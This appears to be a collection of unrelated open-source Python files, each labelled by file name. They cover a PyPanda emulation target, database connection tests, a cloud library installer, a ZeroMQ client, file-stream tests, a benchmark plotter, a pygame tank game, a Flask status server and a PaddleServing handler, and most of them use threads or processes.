"panda-re/panda/blob/master/panda/pypanda/docs/USAGE.md"))
kwargs['executable'] = abspath(pandare.__file__)
super(PyPandaTarget, self).__init__(*args, **kwargs)
self.cb_ctx = 0
self.pypanda = None
self._thread = None
def shutdown(self):
if self._thread is not None and self._thread.is_alive():
self.protocols.execution.remote_disconnect()
self.pypanda.end_analysis()
# Wait for shutdown
while self._thread.is_alive():
sleep(.01)
super(PyPandaTarget, self).shutdown()
@watch('TargetInit')
def init(self, **kwargs):
from pandare import Panda
arch = self.avatar.arch.qemu_name
args = self.assemble_cmd_line()[1:]
self.avatar.save_config(file_name=self.qemu_config_file,
config=self.generate_qemu_config())
self.pypanda = Panda(arch=arch, extra_args=args, **kwargs)
# adjust panda's signal handler to avatar2-standard
def SigHandler(SIG,a,b):
if self.state == TargetStates.RUNNING:
self.stop()
self.wait()
self.avatar.sigint_handler()
self.pypanda._setup_internal_signal_handler(signal_handler=SigHandler)
self._thread = Thread(target=self.pypanda.run, daemon=True)
self._thread.start()
self._connect_protocols()
def register_callback(self, callback, function, name=None, enabled=True,
procname=None):
pp = self.pypanda
if hasattr(pp.callback, callback) is False:
raise Exception("Callback %s not found!" % callback)
cb = getattr(pp.callback, callback)
if name == None:
name = 'avatar_cb_%d' % self.cb_ctx
self.cb_ctx += 1
pp.register_callback(cb, cb(function), name, enabled=enabled,
procname=procname)
return name
def disable_callback(self, name):
pp = self.pypanda
pp.disable_callback(name)
def enable_callback(self, name):
pp = self.pypanda
pp.enable_callback(name)
def add_hook(self, address, function, enabled=True,
kernel=True, asid=None, cb_type="before_block_exec"):
'''
This function registers hook at specified address with pypanda
:param address: Address to be hooked.
:param function: Function to be executed at specified address.
If the cb_type is "before_block_exec" (the default),
the arguments passed to that functions are cdata
pointer to the following structs:
cpustate *, TranslationBlock *, hook *
'''
self.pypanda.hook(address, enabled=enabled, kernel=kernel, asid=asid,
cb_type=cb_type)(function)
@watch('TargetReadMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def read_memory(self, address, size, num_words=1, raw=False):
if raw == False:
return self.protocols.memory.read_memory(address, size, num_words)
else:
return self.pypanda.physical_memory_read(address,size*num_words)
@watch('TargetWriteMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def write_memory(self, address, size, value, num_words=1, raw=False):
if raw == False:
return self.protocols.memory.write_memory(address, size, value, num_words=num_words)
else:
return self.pypanda.physical_memory_write(address, value)
def delete_callback(self, name):
return self.pypanda.delete_callback(name)
|
test_connection.py | import time
import multiprocessing as mp
from threading import Thread
from unittest.mock import patch
import pytest
import rethinkdb as r
def test_get_connection_returns_the_correct_instance():
from bigchaindb.backend import connect
from bigchaindb.backend.connection import Connection
from bigchaindb.backend.rethinkdb.connection import RethinkDBConnection
config = {
'backend': 'rethinkdb',
'host': 'localhost',
'port': 28015,
'name': 'test'
}
conn = connect(**config)
assert isinstance(conn, Connection)
assert isinstance(conn, RethinkDBConnection)
def test_run_a_simple_query():
from bigchaindb.backend import connect
conn = connect()
query = r.expr('1')
assert conn.run(query) == '1'
def test_raise_exception_when_max_tries():
from bigchaindb.backend import connect
from bigchaindb.backend.exceptions import OperationError
class MockQuery:
def run(self, conn):
raise r.ReqlDriverError('mock')
conn = connect()
with pytest.raises(OperationError):
conn.run(MockQuery())
def test_reconnect_when_connection_lost(db_host, db_port):
from bigchaindb.backend import connect
original_connect = r.connect
with patch('rethinkdb.connect') as mock_connect:
mock_connect.side_effect = [
r.ReqlDriverError('mock'),
original_connect(host=db_host, port=db_port)
]
conn = connect()
query = r.expr('1')
assert conn.run(query) == '1'
def test_reconnect_when_connection_lost_tries_n_times():
from bigchaindb.backend import connect
from bigchaindb.backend.exceptions import ConnectionError
with patch('rethinkdb.connect') as mock_connect:
mock_connect.side_effect = [
r.ReqlDriverError('mock'),
r.ReqlDriverError('mock'),
r.ReqlDriverError('mock')
]
conn = connect(max_tries=3)
query = r.expr('1')
with pytest.raises(ConnectionError):
assert conn.run(query) == '1'
def test_changefeed_reconnects_when_connection_lost(monkeypatch):
from bigchaindb.backend.changefeed import ChangeFeed
from bigchaindb.backend.rethinkdb.changefeed import RethinkDBChangeFeed
class MockConnection:
tries = 0
def run(self, *args, **kwargs):
return self
def __iter__(self):
return self
def __next__(self):
self.tries += 1
if self.tries == 1:
raise r.ReqlDriverError('mock')
elif self.tries == 2:
return {'new_val': {'fact':
'A group of cats is called a clowder.'},
'old_val': None}
if self.tries == 3:
raise r.ReqlDriverError('mock')
elif self.tries == 4:
return {'new_val': {'fact': 'Cats sleep 70% of their lives.'},
'old_val': None}
else:
time.sleep(10)
changefeed = RethinkDBChangeFeed('cat_facts', ChangeFeed.INSERT,
connection=MockConnection())
changefeed.outqueue = mp.Queue()
t_changefeed = Thread(target=changefeed.run_forever, daemon=True)
t_changefeed.start()
time.sleep(1)
# try 1: MockConnection raises an error that will stop the
# ChangeFeed instance from iterating for 1 second.
# try 2: MockConnection releases a new record. The new record
# will be put in the outqueue of the ChangeFeed instance.
fact = changefeed.outqueue.get()['fact']
assert fact == 'A group of cats is called a clowder.'
# try 3: MockConnection raises an error that will stop the
# ChangeFeed instance from iterating for 1 second.
assert t_changefeed.is_alive() is True
time.sleep(2)
# try 4: MockConnection releases a new record. The new record
# will be put in the outqueue of the ChangeFeed instance.
fact = changefeed.outqueue.get()['fact']
assert fact == 'Cats sleep 70% of their lives.'
@patch('rethinkdb.connect')
def test_connection_happens_one_time_if_successful(mock_connect):
import bigchaindb
from bigchaindb.backend import connect
timeout = bigchaindb.config['database']['connection_timeout']
query = r.expr('1')
conn = connect('rethinkdb', 'localhost', 1337, 'whatev')
conn.run(query)
mock_connect.assert_called_once_with(host='localhost',
port=1337,
db='whatev',
timeout=timeout)
@patch('rethinkdb.connect', side_effect=r.ReqlTimeoutError())
def test_connection_timeout(mock_connect):
from bigchaindb.backend import connect
from bigchaindb.backend.exceptions import ConnectionError
query = r.expr('1')
conn = connect()
# connection should raise a ConnectionError after 3 tries
with pytest.raises(ConnectionError):
conn.run(query)
assert mock_connect.call_count == 3
|
dataengine-service_install_libs.py | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import os
import sys
import logging
import traceback
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
from fabric.api import *
import multiprocessing
def install_libs(instance, data_engine):
data_engine['instance_ip'] = meta_lib.GCPMeta().get_private_ip_address(instance)
params = '--os_user {} --instance_ip {} --keyfile "{}" --libs "{}"'\
.format(data_engine['os_user'], data_engine['instance_ip'],
data_engine['keyfile'], data_engine['libs'])
try:
# Run script to install additional libs
local("~/scripts/{}.py {}".format('install_additional_libs', params))
except:
traceback.print_exc()
raise Exception
if __name__ == "__main__":
instance_class = 'notebook'
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
logging.info('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
print('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
data_engine = dict()
try:
data_engine['os_user'] = os.environ['conf_os_user']
data_engine['cluster_name'] = os.environ['computational_id']
data_engine['gcp_project_id'] = os.environ['gcp_project_id']
data_engine['gcp_region'] = os.environ['gcp_region']
data_engine['gcp_zone'] = os.environ['gcp_zone']
res = meta_lib.GCPMeta().get_list_instances(data_engine['gcp_zone'], data_engine['cluster_name'])
data_engine['cluster_instances'] = [i.get('name') for i in res['items']]
data_engine['keyfile'] = '{}{}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
data_engine['libs'] = os.environ['libs']
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to get parameter.", str(err))
sys.exit(1)
try:
jobs = []
for instance in data_engine['cluster_instances']:
p = multiprocessing.Process(target=install_libs, args=(instance, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to install additional libraries.", str(err))
sys.exit(1)
|
client.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Hello World client in Python
# Connects REQ socket to tcp://localhost:5555
# Sends "Hello" to server, expects "World" back
#
import zmq
import threading
import queue
from zmqcs.common.message import MessageBase, CommandMSG, AsyncMSG
from zmqcs.common.defaults import Defaults
from zmqcs.client.callbacks import AsyncCallback
from zmqcs.client.stats import AsyncStats
from zmqcs.logs import get_logger
log = get_logger('zmqClient')
class zmqClient(object):
def __init__(self, en_async=True, async_timeout=Defaults.sub_timeout, req_timeout=Defaults.req_timeout):
self.connected = False
self._ctx = None
self._req_socket = None
self._sub_socket = None
self._async_enabled = en_async
self._exit = False
self._async_th = None
# To allow self._sub_socket to be used only from its thread once started we create a queue
self._async_queue = queue.Queue()
self._as = AsyncStats()
self._async_timeout = async_timeout
self._req_timeout = req_timeout
self._callbacks = {}
self._last_req_endpoint = None
self._last_sub_endpoint = None
def connect(self, ip='localhost',
req_port=Defaults.repreq_port,
async_port=Defaults.pubsub_port):
self._last_req_endpoint = f"tcp://{ip}:{req_port}"
self._ctx = zmq.Context()
# Socket to talk to server
self._create_or_reset_req_socket()
log.debug(f"Connected REQ socket to endpoint: {self._last_req_endpoint}")
if self._async_enabled:
self._last_sub_endpoint = f"tcp://{ip}:{async_port}"
self._sub_socket = self._ctx.socket(zmq.SUB)
self._sub_socket.connect(self._last_sub_endpoint)
self._sub_socket.setsockopt(zmq.RCVTIMEO, self._async_timeout)
log.debug(f"Connected SUB socket to endpoint {self._last_sub_endpoint}")
log.info('Initialized sockets')
self.connected = True
def _create_or_reset_req_socket(self):
if self._last_req_endpoint:
if self._req_socket:
self._req_socket.close()
self._req_socket = self._ctx.socket(zmq.REQ)
self._req_socket.setsockopt(zmq.LINGER, 1)
self._req_socket.setsockopt(zmq.RCVTIMEO, self._req_timeout)
self._req_socket.connect(self._last_req_endpoint)
log.debug(f"Connected REQ socket to endpoint: {self._last_req_endpoint}")
def _reset_sub_socket(self):
if self._last_sub_endpoint:
self._sub_socket.close()
self._sub_socket = self._ctx.socket(zmq.SUB)
self._sub_socket.connect(self._last_sub_endpoint)
self._sub_socket.setsockopt(zmq.RCVTIMEO, self._async_timeout)
log.debug(f"Reconnected SUB socket to endpoint {self._last_sub_endpoint}")
def close(self):
if self._async_th:
self._exit = True
log.debug('Set to exit loop')
self._async_th.join()
log.debug('Joined pubsub thread')
self.connected = False
if self._req_socket:
self._req_socket.close(linger=1)
self._req_socket = None
# self._sub_socket is closed when leaving the thread
if self._ctx:
self._ctx = None
def async_subscribe(self, topic, callback):
self._async_queue.put((topic, callback))
def _proc_async_queue(self):
while True:
try:
topic, callback = self._async_queue.get(block=False)
except queue.Empty:
return
else:
try:
self._async_subscribe(topic, callback)
except:
log.exception(f"Failed to register callback to topic '{topic}'")
def _async_subscribe(self, topic, callback):
"""
This is called from the async thread
"""
if self._async_enabled:
# log.debug(f"Petition to subscribe cb '{callback.__class__.__name__}' to topic '{topic}' ")
if not isinstance(topic, bytes):
topic = topic.encode('utf-8')
self._as.new_topic(topic)
if not issubclass(type(callback), AsyncCallback):
raise Exception("callback must be of type AsyncCallback")
if topic not in self._callbacks:
self._callbacks[topic] = []
self._callbacks[topic].append(callback)
self._sub_socket.subscribe(topic)
self._as.cb_reg(topic)
log.debug(f"Subscribed cb '{callback.__class__.__name__}' to topic '{topic}'")
log.debug(f"Currently, there are {len(self._callbacks[topic])} callbacks on topic '{topic}'")
else:
log.error(f"Tried to subscribe to topic '{topic}' but async is not enabled")
def _process_callbacks(self, topic, async_msg):
if topic in self._callbacks:
for cb in self._callbacks[topic]:
try:
cb.run(topic, async_msg)
self._as.cb_call(topic)
except:
log.exception(f"Exception when executing callback for topic '{topic}'")
self._as.exception(topic)
else:
self._as.unknown_topic(topic)
def async_loop(self):
if self._async_enabled:
if not self._sub_socket:
raise Exception('Async socket not initialized')
while not self._exit:
self._proc_async_queue()
try:
# topic, msg_bytes = self._sub_socket.recv_multipart()
topic = None
recv_bytes = self._sub_socket.recv()
try:
topic, async_msg = AsyncMSG.sub_deserialize(recv_bytes)
# log.debug(f"Received async for topic '{topic}'")
except:
log.exception(f"Could not recover AsyncMSG. Received: {recv_bytes}")
self._as.bad_msg(topic)
continue
else:
self._process_callbacks(topic=topic, async_msg=async_msg)
except zmq.error.Again:
# self._reset_sub_socket()
continue
log.info('Out of pubsub loop')
if self._sub_socket:
self._sub_socket.close()
self._sub_socket = None
log.info('Closed sub socket')
else:
log.error('Async loop was executed but async is not enabled')
def start(self):
self._exit = False
if self._async_enabled:
self._async_th = threading.Thread(target=self.async_loop)
self._async_th.start()
log.info("Started pubsub thread")
else:
log.error('Async is not enabled, can\'t start its thread')
def _command(self, cmd):
"""Send a CommandMSG to the server"""
if not issubclass(type(cmd), CommandMSG):
log.debug('Bad command, command should be of type CommandMSG')
raise Exception("Bad command, command should be of type CommandMSG")
try:
self._req_socket.send(cmd.as_bytes)
ans_bytes = self._req_socket.recv()
except zmq.error.Again:
self._create_or_reset_req_socket()
raise
# log.debug(f"Received answer from server for command '{cmd.command}")
return MessageBase.from_bytes(ans_bytes)
def get_async_stats(self):
return self._as.as_json()
|
test_file_utils.py | import asyncio
import io
import os
import threading
from typing import AsyncGenerator
import pytest
from contaxy.utils.file_utils import (
FileStreamWrapper,
FormMultipartStream,
SyncFromAsyncGenerator,
)
@pytest.fixture()
def metadata() -> dict:
return {
"filename": "test.csv",
"headers": {
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryr1D8WqBUjhPTDqlM"
},
"hash": "8fec240e6375b677643833f672cfbc5c",
"content_type": "text/csv",
}
@pytest.fixture()
def multipart_data(metadata: dict) -> dict:
stream = b'------WebKitFormBoundaryr1D8WqBUjhPTDqlM\r\nContent-Disposition: form-data; name="file"; filename="test.csv"\r\nContent-Type: text/csv\r\n\r\n'
stream += 5000 * b"foo;bar\n"
stream += b"\r\n------WebKitFormBoundaryr1D8WqBUjhPTDqlM--\r\n"
metadata.update({"stream": io.BytesIO(stream)})
return metadata
@pytest.fixture()
def file_data(metadata: dict) -> dict:
metadata.update({"stream": io.BytesIO(5000 * b"foo;bar\n")})
return metadata
@pytest.mark.unit
class TestFormMultipartStream:
def test_multipart_stream(self, multipart_data: dict) -> None:
file_stream = multipart_data.get("stream")
assert file_stream
multipart_stream = FormMultipartStream(
file_stream, multipart_data.get("headers"), hash_algo="md5"
)
assert multipart_stream.filename == multipart_data.get("filename")
assert multipart_stream.content_type == multipart_data.get("content_type")
with open(os.devnull, "wb") as file:
while True:
chunk = multipart_stream.read(10 * 1024)
if not chunk:
break
file.write(chunk)
assert multipart_stream.hash == multipart_data.get("hash")
@pytest.mark.unit
class TestSyncFromAsyncGenerator:
def test_iteration(self) -> None:
data = list(range(5))
async def iterate(data: list) -> AsyncGenerator:
for element in data:
yield element
async_generator = iterate(data)
loop = asyncio.new_event_loop()
t = threading.Thread(target=loop.run_forever, daemon=True)
t.start()
sync_generator = SyncFromAsyncGenerator(async_generator, loop)
iterated_data = [element for element in sync_generator]
loop.stop()
assert data == iterated_data
@pytest.mark.unit
class TestFileStreamWrapper:
def test_file_stream_wrapper(self, file_data: dict) -> None:
wrapped_file_stream = FileStreamWrapper(file_data.get("stream"))
initial_hash = wrapped_file_stream.hash
while True:
chunk = wrapped_file_stream.read(10 * 1024)
if not chunk:
break
assert initial_hash != wrapped_file_stream.hash
assert wrapped_file_stream.hash == file_data.get("hash")
|
plot_benchmarks.py | #!/usr/bin/env python3
# Copyright Hans Dembinski 2019
# Distributed under the Boost Software License, Version 1.0.
# See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt
from matplotlib import pyplot as plt, lines
import shelve
from collections import defaultdict
from run_benchmarks import get_commits, run
import numpy as np
import threading
thread = None
current_index = 0
commits, comments = get_commits()
def get_benchmarks(results):
benchmarks = defaultdict(lambda: [])
for hash in commits:
if hash in results and results[hash] is not None:
benchs = results[hash]
for b in benchs["benchmarks"]:
name = b["name"]
time = min(b["cpu_time"], b["real_time"])
benchmarks[name].append((commits.index(hash), time))
return benchmarks
with shelve.open("benchmark_results") as results:
benchmarks = get_benchmarks(results)
fig, ax = plt.subplots(4, 1, figsize=(10, 10), sharex=True)
plt.subplots_adjust(hspace=0, top=0.98, bottom=0.05, right=0.96)
plt.sca(ax[0])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_1d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.sca(ax[1])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_2d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.sca(ax[2])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_3d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.sca(ax[3])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_6d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.figtext(
0.01, 0.5, "time per loop / ns [smaller is better]", rotation=90, va="center"
)
def format_coord(x, y):
global current_index
current_index = max(0, min(int(x + 0.5), len(commits) - 1))
hash = commits[current_index]
comment = comments[hash]
return f"{hash} {comment}"
for axi in ax.flatten():
axi.format_coord = format_coord
def on_key_press(event):
global thread
if thread and thread.is_alive():
return
if event.key != "u":
return
hash = commits[current_index]
def worker(fig, ax, hash):
with shelve.open("benchmark_results") as results:
run(results, comments, hash, True)
benchmarks = get_benchmarks(results)
for name in benchmarks:
xy = benchmarks[name]
x, y = np.transpose(xy)
for axi in ax.flatten():
for artist in axi.get_children():
if isinstance(artist, lines.Line2D) and artist.get_label() == name:
artist.set_xdata(x)
artist.set_ydata(y)
fig.canvas.draw()
thread = threading.Thread(target=worker, args=(fig, ax, hash))
thread.start()
fig.canvas.mpl_connect("key_press_event", on_key_press)
plt.show()
|
Main.py | #!/usr/bin/python3
import pygame, sys, random
from pygame.locals import *
import multiprocessing
import colorama
import sys
#from multiprocessing import Process, Queue
import Tasks
from Tank import *
from Tree import *
from Train import *
from Lake import *
from Tracks import *
from Sheep import *
from Fence import *
from Boat import *
from Path import *
from House import *
from Command import *
pygame.init()
colorama.init
FPS = 30
WHITE = (255, 255, 255)
YELLOW = (200,200,0)
#ERRORDISPLAY = 1
WIDTH = 900
HEIGHT = 600
fpsClock = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((900, 600), 0, 32)
pygame.display.set_caption('tank game')
def gamePrint(text):
print(colorama.Fore.YELLOW + text + colorama.Style.RESET_ALL)
def make_trees(trees,quantity,min_x,max_x,min_y,max_y):
for t in range(quantity):
trees.append(Tree( int(random.random()*(max_x-min_x)) + min_x,
int(random.random()*(max_y-min_y)) + min_y,
'light' if random.random() > 0.5 else 'dark'
))
tank = Tank(300,500)
lake = Lake(0,0)
path = Path(0,0)
tracks = Tracks(0,0)
house = House(610, 240)
trees = []
make_trees(trees,30,0,400,0,200)
make_trees(trees,15,0,180,300,480)
sheepes = [ #XD
Sheep(800,390, 'left'),
Sheep(820,450, 'left'),
Sheep(750,500, 'right'),
Sheep(890,430, 'right'),
Sheep(900,480, 'right')
]
fences = [
Fence(770,550,2),
Fence(700,500,1),
Fence(650,450,2),
Fence(640,380,3),
Fence(685,325,4),
Fence(770,300,5),
Fence(855,310,6)
]
boats = [
Boat(800,10),
Boat(700,30, pos = 'right')
]
train = Train(FPS)
ammobox = AmmoBox(25, 530)
fuel = Fuel(110, 530)
introText = '''\
Welcome to the tank simulation game. You control
the tank via this command line. Type a command
in natural language to give an order.
Type one command at a time. You can use either
simple and more complex sentences.
You don't have any particular goal to achieve.
Just make some noise and try to feel like
a real tank crewman.
'''
def run_game(userInput,received,isDead):
tasklist = []
while True:
if received.value:
massage = UserInput.get()
if massage == 'exit':
pygame.quit()
sys.exit()
received.value = 0
if tank.exist:
if len(tasklist) != 0:
gamePrint('Aborting current action')
tasklist = eval('Tasks.' + massage) if massage else []
if tank.exist and tasklist != []: eval(tasklist.pop(0))
if random.random() < 0.0005: make_trees(trees,1,0,400,0,200)
if random.random() < 0.0005: make_trees(trees,1,0,180,300,480)
for sheep in sheepes:
sheep.move()
sheep.turnIfCollide()
for target in Target.targets:
if tank.exist and Target.detectCollison(target, tank):
Target.delete(target)
for bullet in Bullet.bullets:
if Target.detectCollison(target, bullet):
Target.delete(target)
bullet.remove()
DISPLAYSURF.fill(YELLOW)
for target in Target.targets:
target.display(DISPLAYSURF)
for flash in Destroyed.destroyed:
flash.display(DISPLAYSURF)
for bullet in Bullet.bullets:
bullet.move()
bullet.display(DISPLAYSURF)
ammobox.refillAmmoIfCollison(tank)
ammobox.display(DISPLAYSURF)
fuel.refillFuelIfCollison(tank)
fuel.display(DISPLAYSURF)
if tank.exist == True:
tank.detectWaterCollision(lake)
tank.display(DISPLAYSURF)
else:
if tank.youDiedMassage == False:
gamePrint("Sorry, You died.")
gamePrint("Type anything to exit")
isDead.value = 1
tasklist = []
tank.youDiedMassage = True
train.move()
train.display(DISPLAYSURF)
for event in pygame.event.get():
if event.type == QUIT:
pygame.display.quit()
pygame.quit()
sys.exit()
pygame.display.update()
fpsClock.tick(FPS)
UserInput = multiprocessing.Queue()
received = multiprocessing.Value('i',0)
isDead = multiprocessing.Value('i',0)
game = multiprocessing.Process(target=run_game, args=(UserInput,received,isDead,))
game.start()
gamePrint(introText)
while True:
if isDead.value == 1:
gamePrint("Sorry, you died. You can't give any orders")
gamePrint("Type anything to exit")
UserInput.put('exit')
received.value = 1
sys.exit()
massage = input()
if massage:
if massage == 'exit' and isDead.value == 0:
UserInput.put('exit')
received.value = 1
sys.exit()
break
if isDead.value == 0:
command = Command(massage)
sendToGame = command.interpret()
received.value = 1
UserInput.put(sendToGame)
|
status_server.py | from waitress import serve
from flask import Flask, request
import threading
import http
class StatusServer(object):
def __init__(self):
self.source_done = threading.Event()
self.source_error_event = threading.Event()
self._source_error_message = None
self.sink_done = threading.Event()
self.thread = threading.Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
def run(self):
app = Flask(__name__)
app.add_url_rule('/', view_func=self.get_handler, methods=["GET"])
app.add_url_rule('/source_done', view_func=self.source_done_handler, methods=["PUT"])
app.add_url_rule('/source_error', view_func=self.source_error_handler, methods=["PUT"])
serve(
app,
host="0.0.0.0",
port=8889,
threads=1,
)
def get_handler(self):
if self.source_error_event.is_set():
return 'error', http.HTTPStatus.OK
if not self.source_done.is_set():
return 'receiving', http.HTTPStatus.OK
if not self.sink_done.is_set():
return 'sending', http.HTTPStatus.OK
return 'done', http.HTTPStatus.OK
def source_error_handler(self):
self.source_error_event.set()
self._source_error_message = request.data.decode()
return '', http.HTTPStatus.OK
def source_done_handler(self):
self.source_done.set()
return '', http.HTTPStatus.OK
@property
def source_error_message(self):
if not self.source_error_event.is_set():
return None
return self._source_error_message
@property
def source_sent_all_data(self):
return self.source_done.is_set()
def wait_for_source_sent_all_data(self):
self.source_done.wait()
@property
def sink_received_all_data(self):
return self.sink_done.is_set()
def mark_sink_received_all_data(self):
self.sink_done.set()
|
local_service_handler.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
#from paddle_serving_server import OpMaker, OpSeqMaker
#from paddle_serving_server import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor
_LOGGER = logging.getLogger(__name__)
_workdir_name_gen = util.NameGenerator("workdir_")
class LocalServiceHandler(object):
"""
LocalServiceHandler is the processor of the local service, contains
three client types, brpc, grpc and local_predictor.If you use the
brpc or grpc, serveing startup ability is provided.If you use
local_predictor, local predict ability is provided by paddle_serving_app.
"""
def __init__(self,
model_config,
client_type='local_predictor',
workdir="",
thread_num=2,
device_type=-1,
devices="",
fetch_names=None,
mem_optim=True,
ir_optim=False,
available_port_generator=None,
use_profile=False):
"""
Initialization of localservicehandler
Args:
model_config: model config path
client_type: brpc, grpc and local_predictor[default]
workdir: work directory
thread_num: number of threads, concurrent quantity.
device_type: support multiple devices. -1=Not set, determined by
`devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu
devices: gpu id list[gpu], "" default[cpu]
fetch_names: get fetch names out of LocalServiceHandler in
local_predictor mode. fetch_names_ is compatible for Client().
mem_optim: use memory/graphics memory optimization, True default.
ir_optim: use calculation chart optimization, False default.
available_port_generator: generate available ports
use_profile: use profiling, False default.
Returns:
None
"""
if available_port_generator is None:
available_port_generator = util.GetAvailablePortGenerator()
self._model_config = model_config
self._port_list = []
self._device_name = "cpu"
self._use_gpu = False
self._use_trt = False
self._use_lite = False
self._use_xpu = False
if device_type == -1:
# device_type is not set, determined by `devices`,
if devices == "":
# CPU
self._device_name = "cpu"
devices = [-1]
else:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 0:
# CPU
self._device_name = "cpu"
devices = [-1]
elif device_type == 1:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 2:
# Nvidia Tensor RT
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
self._use_trt = True
elif device_type == 3:
# ARM CPU
self._device_name = "arm"
devices = [-1]
self._use_lite = True
elif device_type == 4:
# Kunlun XPU
self._device_name = "arm"
devices = [int(x) for x in devices.split(",")]
self._use_lite = True
self._use_xpu = True
else:
_LOGGER.error(
"LocalServiceHandler initialization fail. device_type={}"
.format(device_type))
if client_type == "brpc" or client_type == "grpc":
for _ in devices:
self._port_list.append(available_port_generator.next())
_LOGGER.info("Create ports for devices:{}. Port:{}"
.format(devices, self._port_list))
self._client_type = client_type
self._workdir = workdir
self._devices = devices
self._thread_num = thread_num
self._mem_optim = mem_optim
self._ir_optim = ir_optim
self._local_predictor_client = None
self._rpc_service_list = []
self._server_pros = []
self._use_profile = use_profile
self._fetch_names = fetch_names
_LOGGER.info(
"Models({}) will be launched by device {}. use_gpu:{}, "
"use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
"mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
"client_type:{}, fetch_names:{}".format(
model_config, self._device_name, self._use_gpu, self._use_trt,
self._use_lite, self._use_xpu, device_type, self._devices,
self._mem_optim, self._ir_optim, self._use_profile,
self._thread_num, self._client_type, self._fetch_names))
def get_fetch_list(self):
return self._fetch_names
def get_port_list(self):
return self._port_list
def get_client(self, concurrency_idx):
"""
Function get_client is only used for local predictor case, creates one
LocalPredictor object, and initializes the paddle predictor by function
load_model_config.The concurrency_idx is used to select running devices.
Args:
concurrency_idx: process/thread index
Returns:
_local_predictor_client
"""
#checking the legality of concurrency_idx.
device_num = len(self._devices)
if device_num <= 0:
_LOGGER.error("device_num must be not greater than 0. devices({})".
format(self._devices))
raise ValueError("The number of self._devices error")
if concurrency_idx < 0:
_LOGGER.error("concurrency_idx({}) must be one positive number".
format(concurrency_idx))
concurrency_idx = 0
elif concurrency_idx >= device_num:
concurrency_idx = concurrency_idx % device_num
_LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
concurrency_idx, device_num))
from paddle_serving_app.local_predict import LocalPredictor
if self._local_predictor_client is None:
self._local_predictor_client = LocalPredictor()
self._local_predictor_client.load_model_config(
model_path=self._model_config,
use_gpu=self._use_gpu,
gpu_id=self._devices[concurrency_idx],
use_profile=self._use_profile,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
use_trt=self._use_trt,
use_lite=self._use_lite,
use_xpu=self._use_xpu)
return self._local_predictor_client
def get_client_config(self):
return os.path.join(self._model_config, "serving_server_conf.prototxt")
def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
ir_optim):
"""
According to self._device_name, generating one Cpu/Gpu/Arm Server, and
setting the model config amd startup params.
Args:
workdir: work directory
port: network port
gpuid: gpu id
thread_num: thread num
mem_optim: use memory/graphics memory optimization
ir_optim: use calculation chart optimization
Returns:
server: CpuServer/GpuServer
"""
if self._device_name == "cpu":
from paddle_serving_server import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
